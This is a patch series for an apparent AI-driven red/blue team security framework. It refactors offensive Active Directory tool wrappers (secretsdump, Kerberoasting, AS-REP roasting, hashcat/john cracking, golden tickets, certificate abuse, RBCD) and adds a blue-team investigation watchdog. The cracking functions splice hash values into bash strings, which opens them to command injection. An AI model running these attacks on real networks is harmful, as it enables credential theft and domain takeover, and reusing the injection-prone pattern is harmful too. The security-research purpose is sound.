_run_tool(cmd, timeout_seconds=120) logger.info(f"[*] Share enumeration completed for {target}") - return result.stdout + return stdout or stderr - except subprocess.TimeoutExpired: - return f"Share enumeration timed out for {target}" except Exception as e: logger.error(f"Share enumeration failed: {e}") return f"Share enumeration failed for {target}: {e}" @@ -221,7 +228,7 @@ def secretsdump( >>> secretsdump("192.168.1.100", "Administrator", hash="aad3b4...", domain="DOMAIN") >>> secretsdump("domain.local", "Administrator", no_pass=True) # golden ticket """ - cmd = ["/usr/bin/impacket-secretsdump"] + cmd = ["impacket-secretsdump"] if password and domain: target_string = f"{domain}/{username}:{password}@{target}" @@ -241,27 +248,18 @@ def secretsdump( cmd.append(target_string) + # For golden ticket auth, set KRB5CCNAME in the command + if no_pass: + cmd = ["env", "KRB5CCNAME=Administrator.ccache"] + cmd + try: logger.info(f"[*] Running secretsdump on {target} with {username}") - env = os.environ.copy() if no_pass else None - if no_pass and env is not None: - env["KRB5CCNAME"] = "Administrator.ccache" - - result = subprocess.run( - cmd, - check=False, - capture_output=True, - text=True, - timeout=timeout_minutes * 60, - env=env, - ) + stdout, stderr, returncode = _run_tool(cmd, timeout_seconds=timeout_minutes * 60) logger.info(f"[*] Secretsdump completed for {target}") - return result.stdout + return stdout or stderr or f"Secretsdump returned code {returncode}" - except subprocess.TimeoutExpired: - return "[!] Secretsdump timed out" except Exception as e: return f"[!] Secretsdump error: {e}" @@ -293,7 +291,7 @@ def kerberoast( >>> kerberoast("example.local", "user", "pass", "192.168.1.100") """ cmd = [ - "/usr/bin/impacket-GetUserSPNs", + "impacket-GetUserSPNs", f"{domain}/{username}:{password}", "-dc-ip", dc_ip, @@ -302,11 +300,9 @@ def kerberoast( try: logger.info(f"[*] Kerberoasting {domain} using {username}") - result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=60) - return result.stdout + stdout, stderr, _ = _run_tool(cmd, timeout_seconds=60) + return stdout or stderr - except subprocess.TimeoutExpired: - return "Error: Kerberoasting timed out" except Exception as e: return f"Kerberoasting failed: {e!s}" @@ -338,7 +334,7 @@ def asrep_roast( >>> asrep_roast("example.local", "user", "pass", "192.168.1.100") """ cmd = [ - "/usr/bin/impacket-GetNPUsers", + "impacket-GetNPUsers", f"{domain}/{username}:{password}", "-dc-ip", dc_ip, @@ -347,11 +343,9 @@ def asrep_roast( try: logger.info(f"[*] AS-REP roasting {domain} using {username}") - result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=60) - return result.stdout + stdout, stderr, _ = _run_tool(cmd, timeout_seconds=60) + return stdout or stderr - except subprocess.TimeoutExpired: - return "Error: AS-REP roasting timed out" except Exception as e: return f"AS-REP roasting failed: {e!s}" @@ -397,19 +391,15 @@ def domain_admin_checker( cmd.extend(["-x", "whoami"]) - result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=120) + stdout, stderr, _ = _run_tool(cmd, timeout_seconds=120) - output = "" - if result.stdout: - output += result.stdout - if result.stderr: - output += "\n" + result.stderr if output else result.stderr + output = stdout + if stderr: + output += "\n" + stderr if output else stderr logger.info(f"[*] Domain admin check completed for {targets}") return output - except subprocess.TimeoutExpired: - return f"Domain admin checker timed out for {targets}" except Exception as e: logger.error(f"Domain admin checker failed: {e}") return f"Domain admin checker failed: {e}" @@ -458,57 +448,30 @@ def crack_with_hashcat( """ output = "[*] Starting hashcat...\n" - try: - with tempfile.NamedTemporaryFile(mode="w", suffix=".hash", delete=False) as hash_file: - hash_file.write(hash_value) - hash_file_path = hash_file.name - - try: - cmd = [ - "hashcat", - "-m", - str(hashcat_mode), - "-a", - "0", - hash_file_path, - wordlist_path, - "--runtime", - str(max_time_minutes * 60), - "--force", - ] - - _result = subprocess.run( - cmd, - check=False, - capture_output=True, - text=True, - timeout=(max_time_minutes * 60) + 30, - ) - - show_cmd = ["hashcat", "-m", str(hashcat_mode), hash_file_path, "--show"] - - show_result = subprocess.run( - show_cmd, - check=False, - capture_output=True, - text=True, - timeout=30, - ) + # Create hash file remotely and run hashcat + hash_file_path = f"/tmp/hash_{time.time()}.hash" # noqa: S108 # nosec B108 - if show_result.stdout.strip(): - output += "\n✓ CRACKED PASSWORDS:\n" + show_result.stdout - logger.info("[+] Hashcat successfully cracked hash") - else: - output += "\n✗ No passwords cracked" + try: + # Write hash to remote file and run hashcat + cmd = f""" +echo '{hash_value}' > {hash_file_path} +hashcat -m {hashcat_mode} -a 0 {hash_file_path} {wordlist_path} --runtime {max_time_minutes * 60} --force 2>&1 || true +hashcat -m {hashcat_mode} {hash_file_path} --show 2>&1 +rm -f {hash_file_path} +""" + stdout, stderr, _ = _run_tool( + ["bash", "-c", cmd], + timeout_seconds=(max_time_minutes * 60) + 60, + ) - return output + if stdout and ":" in stdout: + output += "\n✓ CRACKED PASSWORDS:\n" + stdout + logger.info("[+] Hashcat successfully cracked hash") + else: + output += "\n✗ No passwords cracked\n" + (stdout or stderr) - finally: - if os.path.exists(hash_file_path): - os.unlink(hash_file_path) + return output - except subprocess.TimeoutExpired: - return output + "\nError: Hashcat timed out" except Exception as e: return output + f"\nError: {e!s}" @@ -546,65 +509,30 @@ def crack_with_john( """ output = "[*] Starting John the Ripper...\n" - try: - with tempfile.NamedTemporaryFile(mode="w", suffix=".hash", delete=False) as hash_file: - hash_file.write(hash_value) - hash_file_path = hash_file.name - - try: - session_name = f"john_session_{int(time.time())}" - cmd = [ - "john", - "--wordlist=" + wordlist_path, - "--format=" + hash_format, - hash_file_path, - "--session=" + session_name, - ] - - subprocess.run( - cmd, - check=False, - capture_output=True, - text=True, - timeout=(max_time_minutes * 60) + 30, - ) + hash_file_path = f"/tmp/john_hash_{time.time()}.hash" # noqa: S108 # nosec B108 + session_name = f"john_session_{int(time.time())}" - show_cmd = ["john", "--show", "--format=" + hash_format, hash_file_path] - - show_result = subprocess.run( - show_cmd, - check=False, - capture_output=True, - text=True, - timeout=30, - ) - - if show_result.stdout.strip(): - output += "\n✓ CRACKED PASSWORDS:\n" + show_result.stdout - logger.info("[+] John successfully cracked hash") - else: - output += "\n✗ No passwords cracked" + try: + # Write hash to remote file and run john + cmd = f""" +echo '{hash_value}' > {hash_file_path} +john --wordlist={wordlist_path} --format={hash_format} {hash_file_path} --session={session_name} 2>&1 || true +john --show --format={hash_format} {hash_file_path} 2>&1 +rm -f {hash_file_path} {session_name}.pot {session_name}.rec {session_name}.log +""" + stdout, stderr, _ = _run_tool( + ["bash", "-c", cmd], + timeout_seconds=(max_time_minutes * 60) + 60, + ) - return output + if stdout and ":" in stdout: + output += "\n✓ CRACKED PASSWORDS:\n" + stdout + logger.info("[+] John successfully cracked hash") + else: + output += "\n✗ No passwords cracked\n" + (stdout or stderr) - finally: - if os.path.exists(hash_file_path): - os.unlink(hash_file_path) + return output - session_files = [ - f"{session_name}.pot", - f"{session_name}.rec", - f"{session_name}.log", - ] - for session_file in session_files: - if os.path.exists(session_file): - try: - os.unlink(session_file) - except Exception: - pass - - except subprocess.TimeoutExpired: - return output + "\nError: John the Ripper timed out" except Exception as e: return output + f"\nError: {e!s}" @@ -658,17 +586,14 @@ def enumerate_share_files( ] logger.info(f"[*] Enumerating files in {share_path}") - result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=120) + stdout, stderr, returncode = _run_tool(cmd, timeout_seconds=120) - if result.returncode != 0: - logger.error(f"[!] Failed to list files: {result.stderr}") - return f"Failed to list files: {result.stderr}" + if returncode != 0: + logger.error(f"[!] Failed to list files: {stderr}") + return f"Failed to list files: {stderr}" - return result.stdout + return stdout - except subprocess.TimeoutExpired: - logger.error(f"[!] File enumeration timed out for {share_path}") - return "File enumeration timed out" except Exception as e: logger.error(f"[!] Error during enumeration: {e!s}") return f"Error during enumeration: {e!s}" @@ -719,13 +644,13 @@ def download_file_content( ] logger.info(f"[*] Downloading {file_path} from {share_path}") - result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=60) + stdout, stderr, returncode = _run_tool(cmd, timeout_seconds=60) - if result.returncode != 0: - logger.error(f"[!] Failed to download file: {result.stderr}") - return f"Failed to download file: {result.stderr}" + if returncode != 0: + logger.error(f"[!] Failed to download file: {stderr}") + return f"Failed to download file: {stderr}" - content = result.stdout + content = stdout logger.info(f"[+] Downloaded {len(content)} bytes from {file_path}") # Log that share was accessed @@ -734,9 +659,6 @@ def download_file_content( return content - except subprocess.TimeoutExpired: - logger.error(f"[!] File download timed out for {file_path}") - return "File download timed out" except Exception as e: logger.error(f"[!] Error downloading file: {e!s}") return f"Error downloading file: {e!s}" @@ -787,11 +709,9 @@ def get_sid( logger.info(f"[*] Getting SID for {domain} using {username}") try: - result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=120) + stdout, stderr, _ = _run_tool(cmd, timeout_seconds=120) logger.info(f"[*] SID lookup completed for {domain}") - return result.stdout - except subprocess.TimeoutExpired: - return "Error: SID lookup timed out" + return stdout or stderr except Exception as e: return f"Error: {e!s}" @@ -847,7 +767,7 @@ def generate_golden_ticket( try: logger.info("[*] Generating golden ticket for Administrator") logger.info(f"[*] Domain: {domain}, SID: {domain_sid}, Extra SID: {extra_sid}") - result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=120) + stdout, stderr, _ = _run_tool(cmd, timeout_seconds=120) if self.state: self.state.has_golden_ticket = True @@ -862,9 +782,7 @@ def generate_golden_ticket( ) self.state.timeline.append(event) - return result.stdout - except subprocess.TimeoutExpired: - return "Error: Golden ticket generation timed out" + return stdout or stderr except Exception as e: return f"Error: {e!s}" @@ -925,13 +843,11 @@ def run_bloodhound( try: logger.info(f"[*] Running BloodHound collection for {domain}") - result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=600) + stdout, stderr, _ = _run_tool(cmd, timeout_seconds=600) logger.info("[+] BloodHound collection completed") - return result.stdout + "\n" + result.stderr + return stdout + "\n" + (stderr or "") - except subprocess.TimeoutExpired: - return "BloodHound collection timed out after 10 minutes" except Exception as e: logger.error(f"BloodHound failed: {e}") return f"BloodHound failed: {e}" @@ -993,15 +909,13 @@ def certipy_find( try: logger.info(f"[*] Enumerating ADCS for {domain}") - result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=300) + stdout, stderr, _ = _run_tool(cmd, timeout_seconds=300) - if "ESC" in result.stdout: + if "ESC" in stdout: logger.warning("[!] VULNERABLE CERTIFICATE TEMPLATES FOUND!") - return result.stdout + "\n" + result.stderr + return stdout + "\n" + (stderr or "") - except subprocess.TimeoutExpired: - return "Certipy enumeration timed out" except Exception as e: return f"Certipy enumeration failed: {e}" @@ -1058,15 +972,13 @@ def certipy_req_esc1( try: logger.info(f"[*] Requesting certificate for {target_upn} via ESC1") - result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=120) + stdout, stderr, _ = _run_tool(cmd, timeout_seconds=120) - if "saved" in result.stdout.lower(): + if "saved" in stdout.lower(): logger.info("[+] Certificate obtained! Use certipy_auth next.") - return result.stdout + "\n" + result.stderr + return stdout + "\n" + (stderr or "") - except subprocess.TimeoutExpired: - return "Certificate request timed out" except Exception as e: return f"Certificate request failed: {e}" @@ -1092,15 +1004,13 @@ def certipy_auth(self, pfx_path: str, dc_ip: str) -> str: try: logger.info("[*] Authenticating with certificate") - result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=60) + stdout, stderr, _ = _run_tool(cmd, timeout_seconds=60) - if "hash" in result.stdout.lower(): + if "hash" in stdout.lower(): logger.info("[+] NTLM hash obtained! Run domain_admin_checker.") - return result.stdout + "\n" + result.stderr + return stdout + "\n" + (stderr or "") - except subprocess.TimeoutExpired: - return "Certificate authentication timed out" except Exception as e: return f"Certificate authentication failed: {e}" @@ -1151,10 +1061,8 @@ def find_delegation( try: logger.info(f"[*] Searching for delegation in {domain}") - result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=120) - return result.stdout - except subprocess.TimeoutExpired: - return "Delegation search timed out" + stdout, stderr, _ = _run_tool(cmd, timeout_seconds=120) + return stdout or stderr except Exception as e: return f"Delegation search failed: {e}" @@ -1200,11 +1108,9 @@ def add_computer( try: logger.info(f"[*] Adding computer account {computer_name}") - result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=60) + stdout, stderr, _ = _run_tool(cmd, timeout_seconds=60) logger.info(f"[+] Computer account {computer_name}$ created") - return result.stdout - except subprocess.TimeoutExpired: - return "Computer account creation timed out" + return stdout or stderr except Exception as e: return f"Computer account creation failed: {e}" @@ -1252,11 +1158,9 @@ def rbcd_write( try: logger.info(f"[*] Configuring RBCD: {delegate_from} -> {delegate_to}") - result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=120) + stdout, stderr, _ = _run_tool(cmd, timeout_seconds=120) logger.info("[+] RBCD configured - use get_st next") - return result.stdout - except subprocess.TimeoutExpired: - return "RBCD configuration timed out" + return stdout or stderr except Exception as e: return f"RBCD configuration failed: {e}" @@ -1302,14 +1206,12 @@ def get_st( try: logger.info(f"[*] Requesting ST for {target_spn} as {impersonate_user}") - result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=120) + stdout, stderr, _ = _run_tool(cmd, timeout_seconds=120) - if ".ccache" in result.stdout: + if ".ccache" in stdout: logger.info("[+] Ticket obtained! Export KRB5CCNAME and use secretsdump -k") - return result.stdout - except subprocess.TimeoutExpired: - return "Service ticket request timed out" + return stdout or stderr except Exception as e: return f"Service ticket request failed: {e}" @@ -1449,11 +1351,67 @@ def record_finding( return f"✓ Recorded share: {share.name} on {share.host}" if finding_type == "admin_access": + details = data.get("details", "") + + # Validate that this is actually a success, not an error being misreported + error_indicators = [ + "not found", + "not available", + "not installed", + "not in path", + "missing", + "failed", + "error", + "cannot", + "unable", + "timed out", + "timeout", + "not properly configured", + "command not found", + "no such file", + "permission denied", + ] + details_lower = details.lower() + + for indicator in error_indicators: + if indicator in details_lower: + logger.warning( + f"[!] Rejecting admin_access finding - details contain error indicator '{indicator}': {details[:200]}" + ) + return ( + f"[!] REJECTED: Cannot record admin_access with error details. " + f"The details contain '{indicator}' which indicates a failure, not success. " + f"Only call record_finding('admin_access') when you have CONFIRMED admin access " + f"(e.g., 'Pwn3d!' in netexec output, successful secretsdump, etc.). " + f"If tools are missing or not working, troubleshoot the environment first." + ) + + # Require some positive indicator of success + success_indicators = [ + "pwn3d", + "admin", + "success", + "authenticated", + "dumped", + "obtained", + ] + has_success_indicator = any(ind in details_lower for ind in success_indicators) + + if not has_success_indicator and len(details) > 0: + logger.warning( + f"[!] Admin access claim lacks success indicators: {details[:200]}" + ) + return ( + "[!] REJECTED: admin_access finding should include evidence of success " + "(e.g., 'Pwn3d!' output, successful authentication, dumped credentials). " + "Provide specific details showing HOW admin access was confirmed." + ) + self.state.has_domain_admin = True event = TimelineEvent( id=f"evt-{len(self.state.timeline):04d}", timestamp=datetime.now(timezone.utc), - description=f"Domain admin access achieved: {data.get('details', '')}", + description=f"Domain admin access achieved: {details}", mitre_techniques=["T1078.002"], # Domain Accounts confidence=1.0, source="domain_admin_checker", diff --git a/uv.lock b/uv.lock index 82f787e0..92e371b4 100644 --- a/uv.lock +++ b/uv.lock @@ -7,24 +7,6 @@ resolution-markers = [ "python_full_version < '3.11'", ] -[[package]] -name = "aiobotocore" -version = "2.26.0" -source = { registry = "https://pypi.org/simple" } -dependencies = [ - { name = "aiohttp" }, - { name = "aioitertools" }, - { name = "botocore" }, - { name = "jmespath" }, - { name = "multidict" }, - { name = "python-dateutil" }, - { name = "wrapt" }, -] -sdist = { url = "https://files.pythonhosted.org/packages/4d/f8/99fa90d9c25b78292899fd4946fce97b6353838b5ecc139ad8ba1436e70c/aiobotocore-2.26.0.tar.gz", hash = "sha256:50567feaf8dfe2b653570b4491f5bc8c6e7fb9622479d66442462c021db4fadc", size = 122026, upload-time = "2025-11-28T07:54:59.956Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/b7/58/3bf0b7d474607dc7fd67dd1365c4e0f392c8177eaf4054e5ddee3ebd53b5/aiobotocore-2.26.0-py3-none-any.whl", hash = "sha256:a793db51c07930513b74ea7a95bd79aaa42f545bdb0f011779646eafa216abec", size = 87333, upload-time = "2025-11-28T07:54:58.457Z" }, -] - [[package]] name = "aiofiles" version = "24.1.0" @@ -129,15 +111,6 @@ wheels = [ { url = "https://files.pythonhosted.org/packages/5d/28/a8a9fc6957b2cee8902414e41816b5ab5536ecf43c3b1843c10e82c559b2/aiohttp-3.13.2-cp313-cp313-win_amd64.whl", hash = "sha256:a88d13e7ca367394908f8a276b89d04a3652044612b9a408a0bb22a5ed976a1a", size = 452192, upload-time = "2025-10-28T20:57:34.166Z" }, ] -[[package]] -name = "aioitertools" -version = "0.13.0" -source = { registry = "https://pypi.org/simple" } -sdist = { url = "https://files.pythonhosted.org/packages/fd/3c/53c4a17a05fb9ea2313ee1777ff53f5e001aefd5cc85aa2f4c2d982e1e38/aioitertools-0.13.0.tar.gz", hash = "sha256:620bd241acc0bbb9ec819f1ab215866871b4bbd1f73836a55f799200ee86950c", size = 19322, upload-time = "2025-11-06T22:17:07.609Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/10/a1/510b0a7fadc6f43a6ce50152e69dbd86415240835868bb0bd9b5b88b1e06/aioitertools-0.13.0-py3-none-any.whl", hash = "sha256:0be0292b856f08dfac90e31f4739432f4cb6d7520ab9eb73e143f4f2fa5259be", size = 24182, upload-time = "2025-11-06T22:17:06.502Z" }, -] - [[package]] name = "aiosignal" version = "1.4.0" @@ -194,6 +167,7 @@ name = "ares" version = "0.1.0" source = { editable = "." } dependencies = [ + { name = "boto3" }, { name = "cyclopts" }, { name = "dreadnode" }, { name = "httpx" }, @@ -226,6 +200,7 @@ dev = [ [package.metadata] requires-dist = [ + { name = "boto3", specifier = ">=1.42.25" }, { name = "cyclopts", specifier = ">=4.2.0" }, { name = "dreadnode", specifier = ">=1.17.0" }, { name = "httpx", specifier = ">=0.28.0,<1.0.0" }, @@ -302,18 +277,32 @@ wheels = [ { url = "https://files.pythonhosted.org/packages/02/e3/a4fa1946722c4c7b063cc25043a12d9ce9b4323777f89643be74cef2993c/backrefs-6.1-py39-none-any.whl", hash = "sha256:a9e99b8a4867852cad177a6430e31b0f6e495d65f8c6c134b68c14c3c95bf4b0", size = 381058, upload-time = "2025-11-15T14:52:06.698Z" }, ] +[[package]] +name = "boto3" +version = "1.42.25" +source = { registry = "https://pypi.org/simple" } +dependencies = [ + { name = "botocore" }, + { name = "jmespath" }, + { name = "s3transfer" }, +] +sdist = { url = "https://files.pythonhosted.org/packages/29/30/755a6c4b27ad4effefa9e407f84c6f0a69f75a21c0090beb25022dfcfd3f/boto3-1.42.25.tar.gz", hash = "sha256:ccb5e757dd62698d25766cc54cf5c47bea43287efa59c93cf1df8c8fbc26eeda", size = 112811, upload-time = "2026-01-09T20:27:44.73Z" } +wheels = [ + { url = "https://files.pythonhosted.org/packages/14/79/012734f4e510b0a6beec2a3d5f437b3e8ef52174b1d38b1d5fdc542316d7/boto3-1.42.25-py3-none-any.whl", hash = "sha256:8128bde4f9d5ffce129c76d1a2efe220e3af967a2ad30bc305ba088bbc96343d", size = 140575, upload-time = "2026-01-09T20:27:42.788Z" }, +] + [[package]] name = "botocore" -version = "1.41.5" +version = "1.42.25" source = { registry = "https://pypi.org/simple" } dependencies = [ { name = "jmespath" }, { name = "python-dateutil" }, { name = "urllib3" }, ] -sdist = { url = "https://files.pythonhosted.org/packages/90/22/7fe08c726a2e3b11a0aef8bf177e83891c9cb2dc1809d35c9ed91a9e60e6/botocore-1.41.5.tar.gz", hash = "sha256:0367622b811597d183bfcaab4a350f0d3ede712031ce792ef183cabdee80d3bf", size = 14668152, upload-time = "2025-11-26T20:27:38.026Z" } +sdist = { url = "https://files.pythonhosted.org/packages/2c/b5/8f961c65898deb5417c9e9e908ea6c4d2fe8bb52ff04e552f679c88ed2ce/botocore-1.42.25.tar.gz", hash = "sha256:7ae79d1f77d3771e83e4dd46bce43166a1ba85d58a49cffe4c4a721418616054", size = 14879737, upload-time = "2026-01-09T20:27:34.676Z" } wheels = [ - { url = "https://files.pythonhosted.org/packages/4e/4e/21cd0b8f365449f1576f93de1ec8718ed18a7a3bc086dfbdeb79437bba7a/botocore-1.41.5-py3-none-any.whl", hash = "sha256:3fef7fcda30c82c27202d232cfdbd6782cb27f20f8e7e21b20606483e66ee73a", size = 14337008, upload-time = "2025-11-26T20:27:35.208Z" }, + { url = "https://files.pythonhosted.org/packages/1e/b0/61e3e61d437c8c73f0821ce8a8e2594edfc1f423e354c38fa56396a4e4ca/botocore-1.42.25-py3-none-any.whl", hash = "sha256:470261966aab1d09a1cd4ba56810098834443602846559ba9504f6613dfa52dc", size = 14553881, upload-time = "2026-01-09T20:27:30.487Z" }, ] [[package]] @@ -3008,16 +2997,27 @@ wheels = [ [[package]] name = "s3fs" -version = "2025.12.0" +version = "0.4.2" source = { registry = "https://pypi.org/simple" } dependencies = [ - { name = "aiobotocore" }, - { name = "aiohttp" }, + { name = "botocore" }, { name = "fsspec" }, ] -sdist = { url = "https://files.pythonhosted.org/packages/cf/26/fff848df6a76d6fec20208e61548244639c46a741e296244c3404d6e7df0/s3fs-2025.12.0.tar.gz", hash = "sha256:8612885105ce14d609c5b807553f9f9956b45541576a17ff337d9435ed3eb01f", size = 81217, upload-time = "2025-12-03T15:34:04.754Z" } +sdist = { url = "https://files.pythonhosted.org/packages/d9/9a/504cb277632c4d325beabbd03bb43778f0decb9be22d9e0e6c62f44540c7/s3fs-0.4.2.tar.gz", hash = "sha256:2ca5de8dc18ad7ad350c0bd01aef0406aa5d0fff78a561f0f710f9d9858abdd0", size = 57527, upload-time = "2020-03-31T15:24:26.388Z" } +wheels = [ + { url = "https://files.pythonhosted.org/packages/b8/e4/b8fc59248399d2482b39340ec9be4bb2493846ac23641b43115a7e5cd675/s3fs-0.4.2-py3-none-any.whl", hash = "sha256:91c1dfb45e5217bd441a7a560946fe865ced6225ff7eb0fb459fe6e601a95ed3", size = 19791, upload-time = "2020-03-31T15:24:24.952Z" }, +] + +[[package]] +name = "s3transfer" +version = "0.16.0" +source = { registry = "https://pypi.org/simple" } +dependencies = [ + { name = "botocore" }, +] +sdist = { url = "https://files.pythonhosted.org/packages/05/04/74127fc843314818edfa81b5540e26dd537353b123a4edc563109d8f17dd/s3transfer-0.16.0.tar.gz", hash = "sha256:8e990f13268025792229cd52fa10cb7163744bf56e719e0b9cb925ab79abf920", size = 153827, upload-time = "2025-12-01T02:30:59.114Z" } wheels = [ - { url = "https://files.pythonhosted.org/packages/44/8c/04797ebb53748b4d594d4c334b2d9a99f2d2e06e19ad505f1313ca5d56eb/s3fs-2025.12.0-py3-none-any.whl", hash = "sha256:89d51e0744256baad7ae5410304a368ca195affd93a07795bc8ba9c00c9effbb", size = 30726, upload-time = "2025-12-03T15:34:03.576Z" }, + { url = "https://files.pythonhosted.org/packages/fc/51/727abb13f44c1fcf6d145979e1535a35794db0f6e450a0cb46aa24732fe2/s3transfer-0.16.0-py3-none-any.whl", hash = "sha256:18e25d66fed509e3868dc1572b3f427ff947dd2c56f844a5bf09481ad3f3b2fe", size = 86830, upload-time = "2025-12-01T02:30:57.729Z" }, ] [[package]] From 37fc3739f22766598cf6bf2a4c723eadaa7b7698 Mon Sep 17 00:00:00 2001 From: Jayson Grace Date: Fri, 9 Jan 2026 20:06:18 -0700 Subject: [PATCH 2/5] refactor: replace signal-based timeout with watchdog thread in investigation agent **Added:** - Introduced `WatchdogTimer` class for enforcing hard investigation timeout using a background thread, enabling forced exit and partial report generation even if the event loop is blocked **Changed:** - Replaced Unix-only signal-based hard timeout with cross-platform watchdog thread in `InvestigationOrchestrator` - Updated timeout handling logic to use the new watchdog and improved partial report generation upon timeout - Cleaned up code by removing signal handler setup and exception raising for timeout, delegating forced exit to the watchdog - Adjusted logging to reflect new watchdog mechanism and clarify timeout events **Removed:** - Removed dependency on `signal` module and associated signal handler logic for timeouts - Eliminated `InvestigationTimeoutError` usage and related exception handling from the orchestration flow - Removed code for restoring old signal handlers and alarm cleanup, as they're no longer needed --- src/ares/agents/blue/soc_investigator.py | 111 +++++++++++++++-------- 1 file changed, 72 insertions(+), 39 deletions(-) diff --git a/src/ares/agents/blue/soc_investigator.py b/src/ares/agents/blue/soc_investigator.py index 9affbea8..e20f5f80 100644 --- a/src/ares/agents/blue/soc_investigator.py +++ b/src/ares/agents/blue/soc_investigator.py @@ -4,7 +4,8 @@ Main agent implementation using Dreadnode Agent SDK. """ -import signal +import os +import threading import uuid from datetime import datetime, timedelta, timezone from pathlib import Path @@ -22,6 +23,62 @@ class InvestigationTimeoutError(Exception): """Raised when investigation exceeds hard timeout.""" +class WatchdogTimer: + """Watchdog that generates report and forcefully exits if timeout is exceeded.""" + + def __init__( + self, + timeout_seconds: int, + investigation_id: str, + state: "InvestigationState", + report_dir: Path, + ): + self.timeout = timeout_seconds + self.investigation_id = investigation_id + self.state = state + self.report_dir = report_dir + self._timer: threading.Timer | None = None + self._cancelled = False + + def _timeout_handler(self) -> None: + if self._cancelled: + return + + logger.critical( + f"WATCHDOG: Investigation {self.investigation_id} exceeded " + f"hard timeout of {self.timeout}s" + ) + logger.warning( + f"Current state: {len(self.state.evidence)} evidence items, " + f"{len(self.state.timeline)} timeline events" + ) + + # Generate partial report before dying + try: + from ares.reports.investigation import MarkdownReportGenerator + + generator = MarkdownReportGenerator(self.report_dir) + report_path = generator.generate(self.state) + logger.warning(f"Partial report saved to: {report_path}") + except Exception as e: + logger.error(f"Failed to generate partial report: {e}") + + logger.critical("Forcing exit due to timeout") + os._exit(1) + + def start(self) -> None: + self._timer = threading.Timer(self.timeout, self._timeout_handler) + self._timer.daemon = True + self._timer.start() + logger.info(f"Watchdog started: {self.timeout}s ({self.timeout // 60}m)") + + def cancel(self) -> None: + self._cancelled = True + if self._timer: + self._timer.cancel() + logger.debug("Watchdog cancelled") + + def build_initial_prompt(alert: dict) -> str: """Build the initial prompt with alert context. @@ -187,26 +244,23 @@ async def investigate(self, alert: dict) -> dict: logger.info(f"Starting investigation {investigation_id} for alert: {alert_name}") - # Hard timeout using signal (works even if event loop is blocked) - # 1 minute per step + 2 minutes buffer for setup/teardown - hard_timeout_seconds = (self.max_steps * 60) + 120 - - def _timeout_handler(signum, frame): - raise InvestigationTimeoutError( - f"Investigation {investigation_id} exceeded hard timeout of {hard_timeout_seconds}s" - ) - - # Set up signal-based hard timeout (Unix only) - old_handler = signal.signal(signal.SIGALRM, _timeout_handler) - signal.alarm(hard_timeout_seconds) - logger.info(f"Hard timeout set: {hard_timeout_seconds}s ({hard_timeout_seconds // 60}m)") - # Create investigation state early so we can generate partial reports on timeout state = InvestigationState( investigation_id=investigation_id, alert=alert, ) + # Hard timeout using watchdog thread (works even if event loop is blocked) + # 1 minute per step + 2 minutes buffer for setup/teardown + hard_timeout_seconds = (self.max_steps * 60) + 120 + watchdog = WatchdogTimer( + hard_timeout_seconds, + investigation_id, + state, + self.report_dir, + ) + watchdog.start() + try: # Ensure MCP connection is ready await self._ensure_mcp_connection() @@ -248,7 +302,7 @@ def _timeout_handler(signum, frame): max_steps=self.max_steps, ) - # Run the investigation with asyncio timeout (backup to signal timeout) + # Run the investigation with asyncio timeout (backup to watchdog) try: import asyncio @@ -313,30 +367,9 @@ def _timeout_handler(signum, frame): dn.log_metric("investigation_failed", 1) raise - except InvestigationTimeoutError: - logger.error(f"Investigation hit HARD TIMEOUT after {hard_timeout_seconds}s") - logger.error( - f"Current state: {len(state.evidence)} evidence items, " - f"{len(state.timeline)} timeline events" - ) - dn.log_metric("investigation_hard_timeout", 1) - - # Generate partial report - report_path = self._generate_report(state, None) - return { - "investigation_id": investigation_id, - "status": "hard_timeout", - "report_path": str(report_path), - "evidence_count": len(state.evidence), - "techniques_identified": list(state.identified_techniques), - "highest_pyramid_level": state.highest_pyramid_level, - } - finally: - # Always cancel the alarm and restore old handler - signal.alarm(0) - signal.signal(signal.SIGALRM, old_handler) - logger.debug("Hard timeout signal handler cleaned up") + # Always cancel the watchdog on normal completion + watchdog.cancel() def _generate_report(self, state: InvestigationState, _result) -> Path: """Generate the markdown investigation report.""" From 31633004d240a60c2ec6f31e419e2840a7050d15 Mon Sep 17 00:00:00 2001 From: Jayson Grace Date: Sat, 10 Jan 2026 16:12:37 -0700 Subject: [PATCH 3/5] feat: add robust log management, enforce query limits, and improve investigation flow **Added:** - Introduced /logs/ directory for agent log files and updated .gitignore to exclude it - Added log directory configuration and automatic log file creation for blue and red team tasks in Taskfile.yaml - Implemented Taskfile log management tasks: list, tail (latest/all/blue/red), and clean - Added log management usage docs to `docs/taskfile_usage.md` - Created timeline event from alert at investigation start for improved reporting - Added `reset_query_tracking()` and query counting utilities to blue_factory to enforce query and tool call limits per investigation - Wrapped Grafana MCP query tools with rate limiting and duplicate query detection - Added max queries/tool calls stop conditions to investigation agent - Blue `record_evidence()` tool now resolves and caches MITRE technique names/tactics - Red agent event logging now debounces rapid/duplicate events for cleaner logs - Red team `secretsdump` tool now includes SMB connectivity check, dc_ip param, and connection timeouts **Changed:** - Default max_steps for blue investigation agent lowered from 150 to 30 for tighter control - Updated all relevant blue and red team tasks to log to per-run logfiles in /logs/ - Blue team investigation flow now enforces strict query and tool call limits; agent is forced to complete if limits are hit - Blue `complete_investigation()` tool now auto-extracts recommendations from alert annotations if none provided, generates fallback synopsis from evidence, and logs more completion details - Enhanced evidence recording: technique metadata resolved and timeline event auto-added from alert - Initial alert prompt and system instructions templates now emphasize query limits, correct IOC extraction, and completion criteria; anti-patterns highlighted - Investigation docs and usage updated to clarify new stop conditions, log management, and completion requirements - Improved blue investigation docs and templates to stress the importance of IOC extraction, evidence recording, and attack synopsis requirements **Removed:** - Removed unused/obsolete warnings and manual validations from blue completion tool - Legacy query loop 